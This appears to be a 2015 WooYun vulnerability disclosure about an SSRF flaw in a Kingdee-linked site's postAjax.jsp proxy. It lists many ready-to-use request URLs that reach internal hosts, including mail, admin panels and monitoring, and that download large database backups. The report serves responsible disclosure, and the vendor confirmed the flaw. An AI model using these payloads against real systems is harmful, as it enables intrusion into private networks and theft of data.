当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:
wooyun-2015-0121070
漏洞标题:
金蝶某站点SSRF漫游内网
相关厂商:
金蝶
漏洞作者:
lijiejie
提交时间:
2015-06-17 10:20
修复时间:
2015-08-01 13:56
公开时间:
2015-08-01 13:56
漏洞类型:
设计缺陷/逻辑错误
危害等级:
自评Rank:
10
漏洞状态:
厂商已经确认
漏洞来源:
http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签:
分享漏洞:
4人收藏 收藏
分享漏洞:
>

漏洞详情

披露状态:

2015-06-17: 细节已通知厂商并且等待厂商处理中
2015-06-17: 厂商已经确认,细节仅向厂商公开
2015-06-27: 细节向核心白帽子及相关领域专家公开
2015-07-07: 细节向普通白帽子公开
2015-07-17: 细节向实习白帽子公开
2015-08-01: 细节向公众公开

简要描述:

金蝶某站点SSRF漫游内网

详细说明:

http://bing.kuaidi100.com/postAjax.jsp?url=http://192.168.226.36/password/forgot.action&v=1.4


url没有过滤,直接代理到内网。。。

漏洞证明:

内网系统为数众多,本来想找个struts命令执行的,但翻了部分IP还没找到。
测试可以下载备份数据库。

kingdee_db.png


kingdee_solr_admin.png


http://bing.kuaidi100.com/postAjax.jsp?url=http://192.168.1.15/&v=1.4
192.168.30.34 ->     ThinkPHP  首页出错   /usr/local/apache/htdocs/activity/Grab/Conf/config.php
http://bing.kuaidi100.com/postAjax.jsp?url=http://192.168.30.42/admin/&v=1.4    Solr Admin
192.168.30.39     通讯系统
通过目录浏览,直接下载备份数据库:
SAAS2_db_2015061609.tgz 16-Jun-2015 05:56  1038M
SAAS2_db_2015061610.tgz 16-Jun-2015 05:55  1048M
SAAS2_db_2015061611.tgz 16-Jun-2015 05:56   394M
http://bing.kuaidi100.com/postAjax.jsp?url=http://192.168.40.8/SAAS2_db_4010/&v=1.4
http://bing.kuaidi100.com/postAjax.jsp?url=http://192.168.40.8/SAAS2_db_4010//SAAS2_db_2015060902.tgz&v=1.4
http://bing.kuaidi100.com/postAjax.jsp?url=http://192.168.206.12/products/&v=1.4  目录浏览
http://bing.kuaidi100.com/postAjax.jsp?url=http://192.168.30.43/&v=1.4      index.do
http://bing.kuaidi100.com/postAjax.jsp?url=http://192.168.200.49/&v=1.4      snmsqr/homepage.asp?total=1
http://bing.kuaidi100.com/postAjax.jsp?url=http://192.168.241.26/&v=1.4      /mail/
http://bing.kuaidi100.com/postAjax.jsp?url=http://192.168.225.110/&v=1.4     http://192.168.225.110/private/main.php
http://bing.kuaidi100.com/postAjax.jsp?url=http://192.168.206.74/&v=1.4      /app/account#/login
http://bing.kuaidi100.com/postAjax.jsp?url=http://192.168.200.62/&v=1.4      https://kdmail.kingdee.com/owa
http://bing.kuaidi100.com/postAjax.jsp?url=http://192.168.200.61/&v=1.4      https://kdmail.kingdee.com/owa
http://bing.kuaidi100.com/postAjax.jsp?url=http://192.168.200.60/&v=1.4      https://kdmail.kingdee.com/owa
http://bing.kuaidi100.com/postAjax.jsp?url=http://192.168.200.59/&v=1.4      https://kdmail.kingdee.com/owa
http://bing.kuaidi100.com/postAjax.jsp?url=http://192.168.200.58/&v=1.4      https://kdmail.kingdee.com/owa
http://bing.kuaidi100.com/postAjax.jsp?url=http://192.168.200.57/&v=1.4      https://kdmail.kingdee.com/owa
http://bing.kuaidi100.com/postAjax.jsp?url=http://192.168.200.162/&v=1.4     /Web1800/8802001
http://bing.kuaidi100.com/postAjax.jsp?url=http://192.168.223.152/&v=1.4     Sorry 系统内部错误
http://bing.kuaidi100.com/postAjax.jsp?url=http://192.168.206.35/&v=1.4      mytest/getMytest.do
http://bing.kuaidi100.com/postAjax.jsp?url=http://192.168.225.99/&v=1.4      http://192.168.225.99/start.html,  IP从99到93
http://bing.kuaidi100.com/postAjax.jsp?url=http://192.168.225.62/&v=1.4      http://192.168.225.62/start.html   IP从62到60
http://bing.kuaidi100.com/postAjax.jsp?url=http://192.168.227.102/&v=1.4     XenServer 6.2.0
http://bing.kuaidi100.com/postAjax.jsp?url=http://192.168.241.111/&v=1.4     http://moneymarket.feidee.com
http://bing.kuaidi100.com/postAjax.jsp?url=http://192.168.223.110/&v=1.4     https://patch.cmcloud.cn
http://bing.kuaidi100.com/postAjax.jsp?url=http://192.168.240.113/&v=1.4     Nagios
http://bing.kuaidi100.com/postAjax.jsp?url=http://192.168.206.41/&v=1.4      我家 首页
http://bing.kuaidi100.com/postAjax.jsp?url=http://192.168.241.82/&v=1.4      中国账客网之[记账啦]后台记账管理中心
http://bing.kuaidi100.com/postAjax.jsp?url=http://192.168.241.47/&v=1.4	     目录浏览
http://bing.kuaidi100.com/postAjax.jsp?url=http://192.168.204.163/&v=1.4     Apache Tomcat
http://bing.kuaidi100.com/postAjax.jsp?url=http://192.168.223.161/&v=1.4     login.do   登入云平台后台管理系统
http://bing.kuaidi100.com/postAjax.jsp?url=http://192.168.241.84/&v=1.4      Apache Tomcat
http://bing.kuaidi100.com/postAjax.jsp?url=http://192.168.206.72/&v=1.4      http://192.168.206.72:80/CompanyController/findCompanyUseRegister.action
http://bing.kuaidi100.com/postAjax.jsp?url=http://192.168.226.36/&v=1.4      /password/forgot.action
http://bing.kuaidi100.com/postAjax.jsp?url=http://192.168.241.40/&v=1.4      Zimbra Web Client Log In

修复方案:

过滤

版权声明:转载请注明来源 lijiejie@乌云

>

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:18

确认时间:2015-06-17 13:54

厂商回复:

谢谢对金蝶的关注,深入研究金蝶系统发现安全漏洞。我们已通知相关部门修复。

最新状态:

暂无